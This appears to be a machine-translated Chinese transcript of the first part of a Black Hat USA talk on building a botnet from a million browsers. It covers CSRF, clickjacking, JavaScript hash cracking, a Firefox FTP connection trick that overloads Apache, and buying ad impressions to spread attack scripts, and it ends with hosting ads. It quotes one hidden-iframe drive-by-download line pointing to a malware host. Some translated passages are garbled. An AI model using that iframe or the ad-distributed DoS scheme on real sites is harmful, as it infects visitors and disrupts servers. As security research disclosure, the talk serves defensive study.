黑帽美国会议。 来自一百万个浏览器的僵尸网络。 第一部分

杰里米·格罗斯曼（Jeremy Grossman）：我很高兴欢迎大家，我想说，我们已经准备了整个6个月的演示文稿，因此我们努力尽快分享我们的成就。 我要感谢整个Black Hat员工的邀请，我们每年都回到这里，我们热爱这项活动。 谢谢您的黑帽！ 我们将尝试使今天的演示变得有趣，但是首先我们要自我介绍。



我是WhiteHat Security的创始人兼新产品开发经理，位于加利福尼亚州圣克拉拉。 我们公司有大约300名员工。

Matt是安全风险研究中心的常务董事。 在“白头翁”中，我们主要从事闯入网站，发现网站中的漏洞并大规模地进行攻击。 但是我们还有一些时间需要研究，因此今天我们将开始对浏览器进行黑客攻击，并使用它们对网站进行黑客攻击，并向您展示网络安全的整个周期。 我在2002年第一次在这里讲话。 我大部分时间都在研究和开发我们的产品。

马特·约翰森（Matt Johansson）：我有一个渗透测试员（五个月）的经验，我在公司中的黑客站点开始工作，因为在此之前，我本人曾领导黑客大军。 我做了一些很酷的研究，并为此付出了很多，因此您可以与我联系。



杰里米·格罗斯曼：所以，让我们开始聚会。 我认为今天至少没有一个人没有访问互联网。 也许现在您尚未连接到Internet，但是当您回到家中时，在这里的每个人以及您认识的每个人都将使用浏览器与之交互。 这只是我们日常生活的一部分，我将向您介绍这意味着什么，但是Internet的主要目的是工作。 我们不会破坏互联网，我们会尝试将其用于我们自己的目的。

当您访问网页时，无论使用哪种浏览器都无关紧要-Chrome，Firefox，Safari，IE或Opera，无论如何，Internet都可以完全控制您的浏览器，无论您在此页面上还是在寻找下一个浏览器时，页面。

此页面上的JavaScript或Flash可能导致浏览器执行任何操作-对Internet或Intranet上任何位置的请求进行任何类型的响应。 这包括CSRF-伪造的跨站点请求，XSS-跨站点脚本，点击劫持以及许多其他技巧，可让您获得对浏览器的控制权。

现在，我们将尝试了解什么是浏览器安全性，但是主要思想是在不使用零日漏洞的情况下获得对浏览器控制的总体了解，而零日漏洞没有针对此漏洞的补丁。

Matt Johanson：如果您对XSS一无所知，可以向我们询问。

杰里米·格罗斯曼（Jeremy Grossman）：现在，我要简要谈谈使用HTML或恶意JavaScript的浏览器攻击：

• 浏览器询问浏览器轮询
• 假跨站点请求； Login Detection登录识别；去匿名；
  入侵企业内部网
  自动Crossite脚本
  使用按下载下载方式进行下载时，传统的恶意软件会进入用户的计算机；
  哈希蛮力破解；
  在应用程序级别的DDoS攻击。
  
  
  
  
  在此幻灯片上，您将看到一个示例浏览器询问-当您转到另一个站点时，只有JavaScript保留在浏览器中。 这是CNN的屏幕截图。 当您访问他们的站点时，该度量标准将连接到您的浏览器，浏览器将执行完整的调查并接收有关您的查看的一堆信息：您使用的浏览器，使用的版本，连接的插件，使用的操作系统。 他们这样做是因为他们想知道谁访问了他们的网站。 如今，这是一种非常普遍的技术。
  
  接下来，考虑一种更高级的技术-跨站点JavaScript伪造。 它不需要太多的工作，您也不需要运行恶意脚本，只需使用带有JavaScript或HTML的浏览器即可入侵其他任何网站。 CSRF使用您的Google搜索历史记录，并强制您的浏览器上传或下载非法内容，进行银行转帐。如果您登录该银行网站上的个人帐户，它将迫使您发送辱骂性消息或将Ed Snowden选为年度人物。
  
  马特·约翰逊（Matt Johansson）： CSRF不仅可以迫使您下载贾斯汀·比伯（Justin Bieber）的流行歌曲，还可以下载儿童色情作品。
  
  杰里米·格罗斯曼（Jeremy Grossman）：因此，幻灯片的第一行迫使您的浏览器向其他网站注入恶意内容，也就是说，它可能使您成为黑客，其次迫使您下载种子，并使您成为违反所有DMCA许可证的海盗，第三行将其发送给粉丝俱乐部贾斯汀·比伯（Justin Bieber），第四名-在某个网站上投票。
  
  
  
  以下是“登录检测”登录名的识别-这是您访问我们控制的网站时的登录名​​。 我们发现您已登录Google，Facebook，Twitter和Linkedin上的帐户。 从浏览器中提取授权数据有6种不同的技术。 我们会研究您的偏好，并对特定用户进行有针对性的攻击。
  
  
  
  另一种攻击是点击劫持，它使您可以在单击任何图片或按钮时立即泄露数据。 假设您登录Twitter或Facebook并喜欢跳舞的猫的图像。 您单击无害的东西，但实际上您单击这些按钮之一并显示您的数据。 只需单击一下即可-我们知道您的姓名，位置，我们知道您在Twitter或LinkedIn上的个人资料上发布的数据。
  
  
  
  马特·约翰森（Matt Johanson）：一些公司从事这种跟踪，因为您的全名对他们的商品或服务进行有针对性的广告宣传可能非常有价值。
  
  杰里米·格罗斯曼（Jeremy Grossman）：到目前为止，我们已经讨论了许多著名的事情，至少对于黑帽用户来说是众所周知的。 您还知道通过将恶意JavaScript通过HTTP注入提供网络连接的DSL路由器来破坏Intranet内部网。
  
  
  
  这是2006年首次发现的，迄今为止尚未修复此漏洞。 接下来，我们将攻击类型称为“自动跨站点脚本”，当使用iframe时，将执行恶意XSS代码注入，这使您可以窃取cookie，保存密码等。 这主要是通过电子邮件提供商的门户完成的。
  
  
  
  最后，您可以通过插入以下行，使用“下载驱动”方法下载传统恶意软件：
  
  

  <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> 

  
  结果，您的浏览器被发送到受感染的站点以下载恶意内容，然后恶意软件控制您的计算机。 在这里，攻击的对象可能是浏览器本身或其扩展，主要是这些攻击用于创建僵尸网络，并且为了避免这种威胁，需要及时安装补丁，最好完全删除Java。 简而言之，这些是我们在本演讲中将重点介绍的攻击方法。
  
  马特·约翰逊（Matt Johansson）：杰里米（Jeremy）谈到了在过去的黑帽子会议上已经提到的事情。 我想谈谈另一项研究，该研究专注于使用JavaScript破解密码的分布式计算。 这是一件很酷的事情，因为您可以简单地编写它，并且它的运行非常非常快。 Lavakumar Kuppan的研究表明，利用他发明的度量标准，如果您可以分发JavaScript，则实际上可以使用JavaScript破解或尝试每秒破解十万个MD5哈希值。
  
  下面的幻灯片显示了基于JavaScript的Ravan分布式计算系统的工作原理，该系统可以使用蛮力攻击在多个浏览器之间攻击哈希。
  
  它使用HTML5在WebWorkers的后台运行JavaScript，包括许多在单个密码猜测网络中打开浏览器的计算机。 她发现与特定哈希匹配的用户密码，每秒从60到7万个密码排序，为此使用了12个WebWorker。
  
  
  
  这是非常快的事情，稍后我们将集中讨论它的分布方式。 除此问题外，我们几个月来一直在认真研究导致服务失败（DoS）的应用程序。 浏览器可以使用WebWorkers的COR向远程站点发送大量的GET请求。 在研究过程中，发现单个浏览器每分钟可以发送大约10,000个请求。 同时，浏览器并没有打开许多TCP连接，而只是同时启动了许多HTTP请求。 您可以同时使用一个浏览器和多个针对一个站点的浏览器。 但是您可以随时通过增加连接数来增加攻击强度。
  
  杰里米·格罗斯曼：我将谈谈浏览器对连接的限制。
  
  
  
  名为Browserscope的工具可显示特定浏览器或特定浏览器版本一次可以支持多少个连接。 所有浏览器都支持不超过6个具有相同主机名的连接，并且最大连接数（例如，在IE版本8和9中达到35）。每个浏览器都对连接数有所限制，这不是出于安全性而是出于稳定性和性能的考虑，因为您要访问该站点，发送请求，您的浏览器就会开始下载内容。
  
  我们检查了这些指标，可以说大多数浏览器确实提供6个功能，最多7个连接。 以下幻灯片显示了Browserscope的操作，该操作测试了各种浏览器的性能，并同时创建了许多与服务器的连接。 在这种情况下，Firefox有六个稳定的连接。
  
  但是，某些浏览器允许您规避此限制，在我们的测试中，我们使用Firefox导致服务失败。 下一张幻灯片显示了Apache Killer脚本，该脚本帮助绕过了浏览器限制，创建了对服务器的并发请求的完整流，并将同时打开的连接数从6增加到300。
  
  
  
  这里使用了HTTP协议，但是如果您通过端口80使用FTP，则连接数将增加到400，这确实可以“杀死” Apache服务器。
  
  马特·约翰森（Matt Johanson）：这里的重要区别是我们使用FTP来完成此操作，而FTP无法使用HTTP协议。 因此，我们无法从列表顶部检查许多位置，并且无法执行许多CSR应用程序。 这些只是我们试图同时打开的连接，因此这不是一种非常传统的DoS攻击，当攻击者试图以每秒或每小时的速度发射尽可能多的兆位或千兆比特时，这只是同时打开的连接所允许的数量。
  
  杰里米·格罗斯曼（Jeremy Grossman）：现在，我将在笔记本电脑上运行Apache服务器，这是Apache 2.4.4的简单“原始”版本，其中所有基本设置都是默认设置，不会产生任何重大影响。
  
  
  
  我们将专注于第一个周期，我将在此处向服务器安装一堆图片请求，您将看到请求的发送方式，服务器在3秒内没有响应，然后图片开始连续加载。
  
  Matt Johanson：这是浏览器性能的一个方面，而不是安全性的一个方面。 我们可能会滥用它，从而损害安全性，您将在几分钟后看到它。 但是，此操作的目的是立即下载所有这些图像。
  
  杰里米·格罗斯曼（Jeremy Grossman）：我忘了提到服务器的状态，在左下角的屏幕上您会看到状态同时显示7个同时打开的连接，其中一个用于浏览器窗口，另一个用于6个上传的图像。 这非常重要，因为现在我们试图打破此特定浏览器中连接的上限。 现在，我将连接值设置为0以终止这些连接，并展示一种绕过Firefox中限制的方法。
  
  对于相同的主机名，我们只需使用FTP最多可以循环100个连接。 它们都不需要URL，因为它是FTP，所以不发送HTTP。 在左下角查找-服务器状态已更改，它显示100个连接，100页供查看。 现在，让我们继续进行400个连接。
  
  该页面每秒更新一次，并且当连接数达到270时，服务器会陷入“恐慌”状态，即没有时间服务更多请求。 我们要做的就是将此代码上传到网页上，Apache尝试将同时打开的连接数增加到300。并且我们使用单个浏览器完成所有这些操作。
  
  在背景的后面，您会看到另一个滚动，我们在Amazon上有另一个系统，这是AWS系统。 我现在不想用DoS攻击杀死她，所以我为您提供了另一个演示选项。
  马特·约翰森（Matt Johansson）：现在我们至少可以使用Firefox知道我们能做什么。 这不是传统的拒绝服务攻击，此处不使用僵尸网络。 我们还有更多的可能性，但是总的来说，使用这种攻击方法进行黑客攻击的优势如下：
  
  
  • 无需恶意软件，漏洞利用或零日攻击；
  • 没有痕迹，没有焦虑；禁止浏览器缓存；
  • 默认情况下，任何浏览器都容易受到此攻击；
  • 非常容易实现，您自己看到了代码看起来多么简单；
  • 正如我们所说-它以应有的方式工作。 Internet可能以这种方式运行，也就是说，它必须确保尽快下载多个图像。
  
  因此，我不知道谁可以解决此问题。 让我们集中讨论使用恶意JavaScript代码传播此攻击方法的问题。 我们不会考虑垃圾邮件发送者使用它的经典方式，例如发送电子邮件。 考虑普通用户的分布，即从普通用户的角度进行缩放：
  
  
  • 使用您拥有大量流量的网站（博客，软件等）；
  • 在热门网站，论坛等中的HTML注入
  • 通过Wi-Fi路由器的“中间人”方法；
  • 搜索引擎的“中毒”；
  • 通过大量注入SQL蠕虫来入侵网站；
  • 第三方小部件（天气，计数器，跟踪器等）。
  
  道格拉斯·克罗克福德（Douglas Crockford）说：“注入恶意代码的最可靠，最具成本效益的方法是购买广告。” 因此，我们将考虑广告网络的工作方式，因为Internet上有很多广告网络。 下一张幻灯片展示了一个独特的广告生态系统。
  
  
  
  因此，在顶部您会看到广告客户首先应该向您展示一些东西，例如，一束鲜花约会。 他们在上面花钱，但是他们需要站点才能将商品带给最终消费者。 他们希望将大众分销商（即博客，新闻，社交网络，评论以及许多用户访问的热门网站）发布在手中。 在广告商和发行商之间有一个桥梁，称为广告网络。 他们花钱在这些网络上发布信息，这些信息可以是图像，弹出横幅，JavaScript-您想要查看的任何内容。 您是幻灯片底部的蓝色小人物。
  
  马特·约翰森（Matt Johansson）：今天早上，我们去了TMZ网站，并在此拍摄了这张惊人的截图。
  
  
  
  您会在页面的顶部和右下方看到广告单元。
  
  杰里米·格罗斯曼（Jeremy Grossman）：您看到的所有广告单元都是JavaScript代码，直接位于TMZ网站用户的前面，并可以吸引他们的注意力，以赚取收益。 此类广告网络有成千上万，但请记住，幻灯片右上角的公司徽标图像不是广告网络！ 这些网络中有些使用JavaScript，有些则没有。
  
  因此，我给一个广告网络的所有者写了一封信，信中我希望将第三方广告JavaScript放入他们的系统中。 几个人很快就回答了我，实际上是在几分钟之内。 他写道，他们只允许从DoubleClick之类的大型知名公司发布此类代码，而DoubleClick是他们信任的公司，他们会一边扫描所有材料以查找潜在的漏洞。 而且，如果我使用DFA之类的大型第三方广告服务器，那么它们将找到托管我的JavaScript的机会。
  
  
  
  所有传统的广告网络都采用这种方式-您付钱给他们，获取一些指标，然后投放广告。 我们遇到了另一种网络。 我们故意不给您他们的名字，因为我们不知道我们是否会因此而陷入困境。
  
  
  
  这些系统以这种方式工作-晚上您花一些钱在家里坐在电脑前的人通过他们的浏览器查看您的页面一定时间。 事实证明，您花一分钱购买浏览器时间-在这种情况下，一万分钟的观看时间约为10.5美元。
  
  马特·约翰森（Matt Johansson）：一个重要情况是这种付费视图方法被广泛用于破解密码。 由于攻击者需要大量时间才能使用蛮力方法破解密码或登录，因此这些广告网络无法保证您的浏览器将在查看广告，但不会捕获在页面上加载广告后立即启动的恶意代码。 您需要为此付费，但是如果有人坐在那里一分钟，十分钟，二秒钟，则无法保证您不会为可用于DoS攻击的事实而付费。
  
  杰里米·格罗斯曼（Jeremy Grossman）：请注意最后一行-您可以购买一百万分钟的观看时间，这几乎是2年的浏览器使用时间，价格约为650美元。 因此，这是一个很好的指标！
  
  现在，互联网可以投放广告，而且值得一分钱。 让我们回到议程上来，集中讨论最后两种类型的攻击-暴力哈希破解和应用程序级DDoS攻击。 您会看到它们可以很容易地被浏览器扩展到一百万，或者只需支付650美元并开始破解相当于两年的密码。 我们将向您展示一些示范，但首先，让我们谈谈经济学。
  
  马特·约翰森（Matt Johansson）：您看到了购买分钟记录的屏幕截图，但是广告网络有其自己的语言，这对我来说并不容易。 广告商称此为“印象”，但我们正在谈论特定页面上的付费广告服务。 在过去的几个月中，价格一直保持在每千次“展示”或每千次广告展示50美分左右。 有CPC和千CPM价格标签。
  
  
  
  因此，当我说“印象”时，您应该将浏览器想象成一个机器人，就好像您雇用了一个人一样，以便将广告上传到浏览器并控制该浏览器。 因此，他们称其为“印象”，而我们称其为“机器人”。
  
  杰里米·格罗斯曼（Jeremy Grossman）：没有任何障碍可以防止坏人，真正的坏人窃取信用卡，能够使用这些被盗卡购买广告时长或“展示次数”。
  
  马特·约翰森（Matt Johanson）：在以下屏幕截图中，您可以看到我们在研究中使用的广告网络上的统计信息。
  
  
  
  感觉就像我们在仪表板的前面一样，单击按钮并试图使我们的广告在此网络上展示。 我们没有展示任何广告，仅显示了虚拟广告，也没有运行我们的JavaScript代码。 我们只是作为广告商尝试自己，并试图对广告网络的用户和所有者保持不显眼的地位，以便他们让我们使用和平的黑客手段来指挥我们自己的Web服务器。 在我们研究的几个月中，我们甚至没有花10美元。
  
  您可以为所有类型的广告项目设置每日限制，可以选择用户应关注的特定关键字，选择广告将要展示的受众群体，操作系统或浏览器的地理位置，还可以将广告重点放在用户的移动或固定设备上。
  
  我只是选择了尽可能广泛的受众，然后选择“计算机”一词作为关键字。 在第一天，我们只购买了15次点击，因此花费了4美元，结果我们收到了8326次“展示”。 想象一下，通过如此有利可图的投资，您的代码可以在24小时内下载到8326浏览器中！
  
  黑帽美国会议。 来自一百万个浏览器的僵尸网络。 第二部分
  
  
  感谢您与我们在一起。 你喜欢我们的文章吗？ 想看更多有趣的资料吗？ 通过下订单或将其推荐给您的朋友来支持我们， 为我们为您发明的入门级服务器的独特模拟，为Habr用户提供30％的折扣： 关于VPS（KVM）E5-2650 v4（6核）的全部真相10GB DDR4 240GB SSD 1Gbps从$ 20还是如何划分服务器？ （RAID1和RAID10提供选件，最多24个内核和最大40GB DDR4）。
  
  VPS（KVM）E5-2650 v4（6核）10GB DDR4 240GB SSD 1Gbps至12月免费，在六个月内付款，您可以在此处订购。
  
  戴尔R730xd便宜2倍？ 仅在荷兰和美国，我们有2台Intel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100电视（249美元起） ！ 阅读有关如何构建基础架构大厦的信息。 使用价格为9000欧元的Dell R730xd E5-2650 v4服务器的上等课程？